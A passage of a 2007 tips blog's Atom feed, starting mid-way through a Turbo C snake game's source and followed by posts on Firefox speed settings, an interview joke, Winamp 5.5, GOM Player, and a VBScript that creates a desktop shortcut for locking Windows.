t[2]=10; t[3]=21;&lt;br /&gt;   t[4]=15; t[5]=10;&lt;br /&gt;   t[6]=20; t[7]=21;&lt;br /&gt;   t[8]=20; t[9]=10;&lt;br /&gt;   fillpoly(5, t);&lt;br /&gt;   size = imagesize(10,10,20,21);&lt;br /&gt;   tail4 = malloc(size);&lt;br /&gt;   getimage(10,10,20,21,tail4);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;   //head1-right&lt;br /&gt;   setlinestyle(1,1,1);&lt;br /&gt;   setcolor(2);&lt;br /&gt;   fillellipse(10,10,10,5);&lt;br /&gt;   setcolor(4);&lt;br /&gt;   //eyes&lt;br /&gt;   fillellipse(15,7,1,1);&lt;br /&gt;   fillellipse(15,13,1,1);&lt;br /&gt;   size = imagesize(10,5,20,15);&lt;br /&gt;   head1 = malloc(size);&lt;br /&gt;   getimage(10,5,20,15,head1);&lt;br /&gt;&lt;br /&gt;   //head2-left&lt;br /&gt;   //eyes&lt;br /&gt;   fillellipse(5,7,1,1);&lt;br /&gt;   fillellipse(5,13,1,1);&lt;br /&gt;   size = imagesize(0,5,10,15);&lt;br /&gt;   head2 = malloc(size);&lt;br /&gt;   getimage(0,5,10,15,head2);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;   //head3-up&lt;br /&gt;   //eyes&lt;br /&gt;   setcolor(2);&lt;br /&gt;   fillellipse(12,12,5,10);&lt;br /&gt;   setcolor(4);&lt;br /&gt;   fillellipse(9,6,1,1);&lt;br /&gt;   fillellipse(15,6,1,1);&lt;br /&gt;   size = imagesize(7,2,18,12);&lt;br /&gt;   head3 = malloc(size);&lt;br /&gt;   getimage(7,2,18,12,head3);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   //head4-down&lt;br /&gt;   //eyes&lt;br /&gt;   fillellipse(9,17,1,1);&lt;br /&gt;   fillellipse(15,17,1,1);&lt;br /&gt;   size = imagesize(7,12,18,22);&lt;br /&gt;   head4 = malloc(size);&lt;br /&gt;   getimage(7,12,18,22,head4);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   //food&lt;br /&gt;   setcolor(15);&lt;br /&gt;   setfillstyle(1,15);&lt;br /&gt;   fillellipse(10,10,3,5);&lt;br /&gt;   size = imagesize(5,3,15,17);&lt;br /&gt;   food = malloc(size);&lt;br /&gt;   getimage(5,3,15,17,food);&lt;br /&gt;   cleardevice();&lt;br /&gt;&lt;br /&gt;    /* repeat until a key is pressed */&lt;br /&gt;&lt;br /&gt;   maxx=getmaxx();&lt;br /&gt;   maxy=getmaxy();&lt;br /&gt;   setlinestyle(0,1,3);&lt;br /&gt;   setcolor(9);&lt;br /&gt;   rectangle(0,0,maxx,maxy);&lt;br /&gt;   setlinestyle(0,1,2);&lt;br /&gt;   line(maxx-150,0,maxx-150,maxy);&lt;br /&gt;   setcolor(8);&lt;br /&gt;   setfillstyle(1,8);&lt;br /&gt;   bar(maxx-147,3,maxx-3,63);&lt;br /&gt;   setcolor(12);&lt;br /&gt;   int maze=1;&lt;br /&gt;   if(maze==1)&lt;br /&gt;   {&lt;br /&gt;   setfillstyle(1,6);&lt;br /&gt;   bar(4,4,maxx-154,14);&lt;br /&gt;   bar(4,4,14,maxy-4);&lt;br /&gt;   bar(4,maxy-4,maxx-154,maxy-14);&lt;br /&gt;   bar(maxx-154-10,4,maxx-154,maxy-4);&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;   settextstyle(0,0,1);&lt;br /&gt;   delay(300);&lt;br /&gt;   outtextxy(maxx-125,30,"RATTLE SNAKE");&lt;br /&gt;   delay(300);&lt;br /&gt;   setcolor(11);&lt;br /&gt;   setlinestyle(0,1,2);&lt;br /&gt;   rectangle(maxx-145,65,maxx-5,205);&lt;br /&gt;   outtextxy(maxx-128,70,"INSTRUCTIONS");&lt;br /&gt;   delay(200);&lt;br /&gt;   setcolor(6);&lt;br /&gt;   outtextxy(maxx-140,90,"Commands     Key");&lt;br /&gt;   delay(300);&lt;br /&gt;   setcolor(8);&lt;br /&gt;   outtextxy(maxx-140,110," Move Up      8");&lt;br /&gt;   delay(50);&lt;br /&gt;   outtextxy(maxx-140,130," Move Down    5");&lt;br /&gt;    delay(50);&lt;br /&gt;   outtextxy(maxx-140,150," Move Right   6");&lt;br /&gt;    delay(50);&lt;br /&gt;   outtextxy(maxx-140,170," Move Left    4");&lt;br /&gt;    delay(50);&lt;br /&gt;   outtextxy(maxx-140,190," Exit         0");&lt;br /&gt;   delay(200);&lt;br /&gt;   setcolor(12);&lt;br /&gt;   setlinestyle(0,1,2);&lt;br /&gt;   rectangle(maxx-145,210,maxx-5,350);&lt;br /&gt;   setcolor(1);&lt;br /&gt;   outtextxy(maxx-130,220,"Player's Name");&lt;br /&gt;   setcolor(15);&lt;br /&gt;   outtextxy(maxx-100,230,"hiral");&lt;br /&gt;   setcolor(4);&lt;br /&gt;   delay(200);&lt;br /&gt;   itoa(score,scor,10);&lt;br /&gt;   outtextxy(maxx-140,250,"Score");&lt;br /&gt;   outtextxy(maxx-50,250,scor);&lt;br /&gt;   delay(200);&lt;br /&gt;   setcolor(10);&lt;br /&gt;   outtextxy(maxx-140,280,"Level");&lt;br /&gt;   delay(200);&lt;br /&gt;   setcolor(13);&lt;br /&gt;   outtextxy(maxx-140,310,"Maze        1");&lt;br /&gt;   delay(200);&lt;br /&gt;   setcolor(14);&lt;br /&gt;   outtextxy(maxx-140,340,"High Score  ");&lt;br /&gt;   outtextxy(maxx-50,340,hs);&lt;br /&gt;&lt;br /&gt;   for(j=0; j&lt;=1000; j++)&lt;br /&gt;   {&lt;br /&gt; putpixel(random(maxx-150),random(maxy),6);&lt;br /&gt; delay(1);&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   while (a!='0')&lt;br /&gt;   {&lt;br /&gt;&lt;br /&gt;       // plot new image&lt;br /&gt;      if(a=='6')&lt;br /&gt;     putimage(x, y, head1, XOR_PUT);&lt;br /&gt;      if(a=='4')&lt;br /&gt;     putimage(x, y, head2, XOR_PUT);&lt;br /&gt;      if(a=='8')&lt;br /&gt;     putimage(x, y, head3, XOR_PUT);&lt;br /&gt;      if(a=='5')&lt;br /&gt;     putimage(x, y, head4, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      for(j=0; j&lt;k; j++)&lt;br /&gt;      {&lt;br /&gt;    putimage(X[i-j], Y[i-j], body, XOR_PUT);&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])&lt;0  &amp;&amp; (Y[i-j-1]-Y[i-j])==0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail1, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])&gt;0  &amp;&amp; (Y[i-j-1]-Y[i-j])==0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail2, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])==0  &amp;&amp; (Y[i-j-1]-Y[i-j])&lt;0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail3, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])==0  &amp;&amp; (Y[i-j-1]-Y[i-j])&gt;0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail4, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      delay(speed);&lt;br /&gt;&lt;br /&gt;      if(second==1)&lt;br /&gt;      {&lt;br /&gt; setcolor(15);&lt;br /&gt; outtextxy(maxx-140,360,"Press Any Key...");&lt;br /&gt; getch();&lt;br /&gt; setcolor(0);&lt;br /&gt; outtextxy(maxx-140,360,"Press Any Key...");&lt;br /&gt; a='6';&lt;br /&gt;&lt;br /&gt; second=2;&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      if(first==1)&lt;br /&gt;      {&lt;br /&gt; setcolor(15);&lt;br /&gt; outtextxy(maxx-140,360,"Congratulations  ");&lt;br /&gt; sound(100);&lt;br /&gt; delay(300);&lt;br /&gt; nosound();&lt;br /&gt; getch();&lt;br /&gt; setcolor(0);&lt;br /&gt; outtextxy(maxx-140,360,"Congratulations  ");&lt;br /&gt; second++;&lt;br /&gt; first=2;&lt;br /&gt;&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt; // erase old image&lt;br /&gt;      if(a=='6')&lt;br /&gt;     putimage(x, y, head1, XOR_PUT);&lt;br /&gt;      if(a=='4')&lt;br /&gt;     putimage(x, y, head2, XOR_PUT);&lt;br /&gt;      if(a=='8')&lt;br /&gt;     putimage(x, y, head3, XOR_PUT);&lt;br /&gt;      if(a=='5')&lt;br /&gt;     putimage(x, y, head4, XOR_PUT);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      for(j=0; j&lt;k; j++)&lt;br /&gt;      {&lt;br /&gt;    putimage(X[i-j], Y[i-j], body, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])&lt;0  &amp;&amp; (Y[i-j-1]-Y[i-j])==0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail1, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])&gt;0  &amp;&amp; (Y[i-j-1]-Y[i-j])==0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail2, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])==0  &amp;&amp; (Y[i-j-1]-Y[i-j])&lt;0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail3, XOR_PUT);&lt;br /&gt;&lt;br /&gt;      if((X[i-j-1]-X[i-j])==0  &amp;&amp; (Y[i-j-1]-Y[i-j])&gt;0)&lt;br /&gt;     putimage(X[i-j], Y[i-j], tail4, XOR_PUT);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      if(f==0)&lt;br /&gt;      {&lt;br /&gt; putimage(r1,r2,food,XOR_PUT);&lt;br /&gt; f=1;&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt;      z--;&lt;br /&gt;      if((x&gt;=r1 &amp;&amp; y&gt;=r2 &amp;&amp; x&lt;=r1+10 &amp;&amp; y&lt;=r2+10) || (x&lt;=r1 &amp;&amp; y&lt;=r2 &amp;&amp;&lt;br /&gt;x&gt;=r1-10 &amp;&amp; y&gt;=r2-10) || z==0)&lt;br /&gt;      {&lt;br /&gt; if(z!=0)&lt;br /&gt; {&lt;br /&gt;  sound(800);&lt;br /&gt;  delay(20);&lt;br /&gt;  setcolor(0);&lt;br /&gt;  score += 10;&lt;br /&gt;  outtextxy(maxx-50,250,scor);&lt;br /&gt;  itoa(score,scor,10);&lt;br /&gt;  if(score&gt;hscore)&lt;br /&gt;  {&lt;br /&gt;   strcpy(hs,scor);&lt;br /&gt;   setfillstyle(1,1);&lt;br /&gt;   bar(maxx-140,337,maxx-20,348);&lt;br /&gt;   setcolor(14);&lt;br /&gt;   outtextxy(maxx-50,340,hs);&lt;br /&gt;   outtextxy(maxx-140,340,"High Score  ");&lt;br /&gt;   if(first==0)&lt;br /&gt;   {&lt;br /&gt;   first=1;&lt;br /&gt;   }&lt;br /&gt;  }&lt;br /&gt;  setcolor(4);&lt;br /&gt;  outtextxy(maxx-50,250,scor);&lt;br /&gt;  k++;&lt;br /&gt; nosound();&lt;br /&gt; }&lt;br /&gt; z=100;&lt;br /&gt; putimage(r1,r2,food,XOR_PUT);&lt;br /&gt; repr1:&lt;br /&gt; r1=random(450);&lt;br /&gt;     if(r1&lt;50)&lt;br /&gt;        goto repr1;&lt;br /&gt; repr2:&lt;br /&gt; r2=random(400);&lt;br /&gt;     if(r2&lt;50)&lt;br /&gt;  goto repr2;&lt;br /&gt;&lt;br /&gt; f=0;&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      i++;&lt;br /&gt;      X[i]=x;&lt;br /&gt;      Y[i]=y;&lt;br /&gt;&lt;br /&gt;      b=a;&lt;br /&gt;      if(kbhit())&lt;br /&gt;      {&lt;br /&gt;  rep:&lt;br /&gt;  a=getche();&lt;br /&gt;&lt;br /&gt;  if((b=='6' &amp;&amp; a=='4') || (b=='4' &amp;&amp; a=='6'))&lt;br /&gt;   a=b;&lt;br /&gt;&lt;br /&gt;  if((b=='8' &amp;&amp; a=='5') || (b=='5' &amp;&amp; a=='8'))&lt;br /&gt;   a=b;&lt;br /&gt;&lt;br /&gt;  if(a!='6' &amp;&amp; a!='4' &amp;&amp; a!='8' &amp;&amp; a!='0' &amp;&amp; a!='5')&lt;br /&gt;   a=b;&lt;br /&gt;      }&lt;br /&gt;&lt;br /&gt; /*     if(x&gt;maxx-170)&lt;br /&gt; x=0;&lt;br /&gt;&lt;br /&gt;      if(y&gt;maxy)&lt;br /&gt; y=0;*/&lt;br /&gt;&lt;br /&gt;      if(a=='8')&lt;br /&gt; y -= bo;&lt;br /&gt;&lt;br /&gt;      if(a=='5')&lt;br /&gt; y += bo;&lt;br /&gt;&lt;br /&gt;      if(a=='4')&lt;br /&gt; x -= bo;&lt;br /&gt;&lt;br /&gt;      if(a=='6')&lt;br /&gt; x += bo;&lt;br /&gt;&lt;br /&gt;      for(j=i+1; j&lt;i-k; j--)&lt;br /&gt;      {&lt;br /&gt; if((Y[i]&gt;=Y[j] &amp;&amp; Y[i]&lt;=Y[j]+10) || (Y[i]&lt;=Y[j] &amp;&amp; Y[i]&gt;=X[j]-10))&lt;br /&gt; {&lt;br /&gt;  if((X[i]&gt;=X[j] &amp;&amp; X[i]&lt;=X[j]+10) || (X[i]&lt;=X[j] &amp;&amp; X[i]&gt;=X[j]-10))&lt;br /&gt;  {&lt;br /&gt;   a='0';&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;   outtextxy(maxx-140,360,"C ");&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; if((X[i]&gt;=X[j] &amp;&amp; X[i]&lt;=X[j]+10) || (X[i]&lt;=X[j] &amp;&amp; X[i]&gt;=X[j]-10))&lt;br /&gt; {&lt;br /&gt;  if((Y[i]&gt;=Y[j] &amp;&amp; Y[i]&lt;=Y[j]+10) || (Y[i]&lt;=Y[j] &amp;&amp; Y[i]&gt;=X[j]-10))&lt;br /&gt;  {&lt;br /&gt;   a='0';&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;   outtextxy(maxx-140,360,"C  ");&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;       }&lt;br /&gt;&lt;br /&gt;/*      for(j=i; j&lt;i-k; j--)&lt;br /&gt;      {&lt;br /&gt; if((y&gt;=Y[j] &amp;&amp; y&lt;=Y[j]+10) || (y&lt;=Y[j] &amp;&amp; y&gt;=Y[j]-10))&lt;br /&gt; {&lt;br /&gt;  if((x&gt;=X[j] &amp;&amp; x&lt;=X[j]+10) || (x&lt;=X[j] &amp;&amp; x&gt;=X[j]-10))&lt;br /&gt;  {&lt;br /&gt;   a='5';&lt;br /&gt;  }&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt; if((x&gt;=X[j] &amp;&amp; x&lt;=X[j]+10) || (x&lt;=X[j] &amp;&amp; x&gt;=X[j]-10))&lt;br /&gt; {&lt;br /&gt;  if((y&gt;=Y[j] &amp;&amp; y&lt;=Y[j]+10) || (y&lt;=Y[j] &amp;&amp; y&gt;=Y[j]-10))&lt;br /&gt;  {&lt;br /&gt;   a='5';&lt;br /&gt;  }&lt;br /&gt; }&lt;br /&gt; if(j==0)&lt;br /&gt;  break;&lt;br /&gt;      }      */&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;  /* if(x&lt;=0)&lt;br /&gt; x=maxx-170;&lt;br /&gt;&lt;br /&gt; if(y&lt;=0)&lt;br /&gt; y=maxy;*/&lt;br /&gt;&lt;br /&gt; if(maze==1)&lt;br /&gt; {&lt;br /&gt;  if(x&lt;=14 || x&gt;=maxx-184 || y&lt;=14 || y&gt;=maxy-14)&lt;br /&gt;  {&lt;br /&gt;     a='0';&lt;br /&gt;  }&lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   if(score&gt;hscore)&lt;br /&gt;   {&lt;br /&gt; ofstream onfile("c:\tc\bin\rattle.txt");&lt;br /&gt; onfile&lt;&lt;scor;&lt;br /&gt; onfile.close();&lt;br /&gt;   }&lt;br /&gt;&lt;br /&gt;   setcolor(15);&lt;br /&gt;   outtextxy(maxx-140,390,"    Gameover");&lt;br /&gt;   sound(100);&lt;br /&gt;   delay(400);&lt;br /&gt;   nosound();&lt;br /&gt;   getch();&lt;br /&gt;   /* clean up */&lt;br /&gt;   free(body);&lt;br /&gt;   closegraph();&lt;br /&gt;&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-888558095582597830?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/888558095582597830/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=888558095582597830' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/888558095582597830'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/888558095582597830'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/excellent-snake-game-develped-in-cc.html' title='A excellent snake game develped in c/c++.'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-796626357729174237</id><published>2007-11-25T09:14:00.000-08:00</published><updated>2008-12-11T17:29:59.833-08:00</updated><title type='text'>Make your firefox run at lightining speed.</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_5EHOESWcP_k/R0mudCFH1qI/AAAAAAAAAEA/CzSjYmvX5bg/s1600-h/header.JPG"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_5EHOESWcP_k/R0mudCFH1qI/AAAAAAAAAEA/CzSjYmvX5bg/s320/header.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5136828663790556834" /&gt;&lt;/a&gt;&lt;br /&gt;Make your firefox run at lightining speed. &lt;br /&gt;&lt;br /&gt;These are few steps to make your firefox run at lightining speed.&lt;br /&gt;&lt;br /&gt;1. First in the URL bar, Type “about:config”. This will bring up a list of commands and variables you can edit.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. The second step is to put “network.http.pipelining” in the filter and change the value to “true”.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. After that you will want to put “network.http.proxy.pipelining” in the filter.&lt;br /&gt;Like the last one, make that value set to “true” also.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Next, locate “network.http.pipelining.maxrequests” and change the value to some number higher, say 10,20 or even 30, it would make up to 10,20 or 30 requests at once.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. The last step is to right click anywhere and select “New” then “Integer”. Name it “nglayout.initialpaint.delay” and make its value “0″. This will make the browser respond faster on the information of the websites it receives.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Close out FireFox (make sure FireFox is closed by viewing the Task Manager) and restart it and enjoy the new mega speed&lt;br /&gt;Aug 29 &lt;br /&gt;Toooo smart….:) &lt;br /&gt;Interviewer said, “I shall either ask you ten easy questions or one really difficult question. Think well before you make up your mind!”&lt;br /&gt;&lt;br /&gt;Interviewer said, ” I shall either ask you ten easy questions or one really difficult question. Think well before you make up your mind!”&lt;br /&gt;&lt;br /&gt;The candidate thought for a while and said, ” My choice is one really difficult question.”&lt;br /&gt;&lt;br /&gt;” Well, good luck to you, you have made your own choice!” said the interviewer.&lt;br /&gt;&lt;br /&gt;Here is your question: ” What comes first, Day or Night?”&lt;br /&gt;&lt;br /&gt;The boy was jolted into reality as his admission depended on the correctness of the answer to that one question. He thought for a while and said, ” It’s DAY sir!”&lt;br /&gt;&lt;br /&gt;” How?” the interviewer asked.&lt;br /&gt;&lt;br /&gt;” Sorry sir, you promised me that you will not ask me a SECOND difficult question!”&lt;br /&gt;&lt;br /&gt;Moral : Technical Skill is the mastery of complexity, while Creativity is the mastery of simplicity&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-796626357729174237?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/796626357729174237/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=796626357729174237' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/796626357729174237'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/796626357729174237'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/make-your-firefox-run-at-lightining.html' title='Make your firefox run at lightining speed.'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_5EHOESWcP_k/R0mudCFH1qI/AAAAAAAAAEA/CzSjYmvX5bg/s72-c/header.JPG' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-1778230575654009534</id><published>2007-11-25T09:09:00.000-08:00</published><updated>2008-12-11T17:30:00.023-08:00</updated><title type='text'>Winamp 5.5 aims at iTunes with new interface</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_5EHOESWcP_k/R0msuSFH1pI/AAAAAAAAAD4/wdi773Zn-UQ/s1600-h/bento-winamp-thumb.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_5EHOESWcP_k/R0msuSFH1pI/AAAAAAAAAD4/wdi773Zn-UQ/s320/bento-winamp-thumb.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5136826761120044690" /&gt;&lt;/a&gt;&lt;br /&gt;Winamp 5.5 aims at iTunes with new interface &lt;br /&gt;Bad boys at Nullsoft have been developing the new Winamp 5.5 for over a year now. Winamp is celebrating its 10th anniversary next month, and to mark this event, they are releasing Winamp 5.5 (also known as Winamp 10th Anniversary Edition) on 10/10 at 10:10 am. The beta version of Winamp 5.5 is already out for testers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Winamp 5.5 boasts an all-new unified interface called Bento Skin. If you are someone like me, who loves iTunes like interface, then you must this one! Unlike, the ugly old multiple window interface, Bento looks awesome with sleek black color and album art support.&lt;br /&gt;&lt;br /&gt;Here’s a highlight of some of the new features seen in Winamp 5.5:&lt;br /&gt;&lt;br /&gt;A brand new unified user interface with album art support More Like This automatic playlist generator Media Monitor tool that automatically playlists playable songs from any web page Fully integrated browser with Smart Search functionality MP3 surround playback support Remote access to your music and videos on the web, compatible mobile devices, and TVs using Wii, PS3 and Xbox 360 A custom Winamp browser toolbar with integrated Winamp playback controls [Coming Soon] I was a great fan of Winamp some years ago, back then it so lightweight. All these years, especially after AOL took over Winamp, it seems like Winamp is now growing up to become more like iTunes.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://forums.winamp.com/showthread.php?threadid=277166"&gt;Download Winamp 5.5 Beta&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-1778230575654009534?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/1778230575654009534/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=1778230575654009534' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1778230575654009534'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/1778230575654009534'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/winamp-55-aims-at-itunes-with-new.html' title='Winamp 5.5 aims at iTunes with new interface'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_5EHOESWcP_k/R0msuSFH1pI/AAAAAAAAAD4/wdi773Zn-UQ/s72-c/bento-winamp-thumb.png' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-2671471459723870054</id><published>2007-11-25T08:53:00.000-08:00</published><updated>2008-12-11T17:30:00.172-08:00</updated><title type='text'>GOM Player Plays All Of Your Videos</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_5EHOESWcP_k/R0mpCSFH1nI/AAAAAAAAADo/jCFlnLxnCj0/s1600-h/GOMPlayer.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_5EHOESWcP_k/R0mpCSFH1nI/AAAAAAAAADo/jCFlnLxnCj0/s320/GOMPlayer.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5136822706670917234" /&gt;&lt;/a&gt;&lt;br /&gt;GOM Player Plays All Of Your Videos &lt;br /&gt; Do you have a hard time finding a media player that has all of the codecs that you need? GOM Player will solve those problems and many more. It can support formats like AVI, DAT, MPEG, DivX, XviD, WMV, ASF, and the list keeps going!&lt;br /&gt;&lt;br /&gt;Are you in the middle of downloading a movie or do you have a broken AVI file? GOM Player can play files that are missing frames and it will just skip them when they are found…making the video as seamless as possible. If that doesn’t sound sweet enough then maybe some of these other features will push you over the edge:&lt;br /&gt;&lt;br /&gt;Editable SkinsHTTP streamingDrag-and-drop supportSubtitlingOverlay mixerKey remappingEnhanced filter renderingRebuilding for AVI filesReal-time indexI didn’t find out about this player until a few weeks ago when a friend told me about it. Ever since I haven’t been able to go back to using anything else. Sure it is great that it has the huge list of codecs built-in but you’ll love how fast it runs.&lt;br /&gt;&lt;br /&gt;Cost: FREE&lt;br /&gt;Download GOM Player&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-2671471459723870054?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/2671471459723870054/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=698730440747916573&amp;postID=2671471459723870054' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2671471459723870054'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/698730440747916573/posts/default/2671471459723870054'/><link rel='alternate' type='text/html' href='http://rahulxptricks.blogspot.com/2007/11/gom-player-plays-all-of-your-videos-do.html' title='GOM Player Plays All Of Your Videos'/><author><name>rahul arya</name><uri>http://www.blogger.com/profile/09312819518780089181</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01471067711164177734'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_5EHOESWcP_k/R0mpCSFH1nI/AAAAAAAAADo/jCFlnLxnCj0/s72-c/GOMPlayer.jpg' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-698730440747916573.post-8576973851077868525</id><published>2007-11-24T06:50:00.000-08:00</published><updated>2007-11-24T06:51:25.987-08:00</updated><title type='text'>lock my computer</title><content type='html'>Latest trick to lock my computer(pc) so that no one can open. &lt;br /&gt;   &lt;br /&gt;lock ur pc.. open notepad copy and paste the script below and save it .VBS extention&lt;br /&gt;This wil create a shortcut.. run(click) it&lt;br /&gt;&lt;br /&gt;set WshShell = WScript.CreateObject("WScript.Shell")&lt;br /&gt;set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("D esktop") &amp; "\LockWorkstation.lnk")&lt;br /&gt;oShellLink.TargetPath = "%windir%\system32\rundll32.exe"&lt;br /&gt;oShellLink.Arguments = "user32.dll,LockWorkStation"&lt;br /&gt;oShellLink.Save&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/698730440747916573-8576973851077868525?l=rahulxptricks.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://rahulxptricks.blogspot.com/feeds/8576973851077868525/comments/default' title='Post Comments'/><link rel='replies' type='text/html' 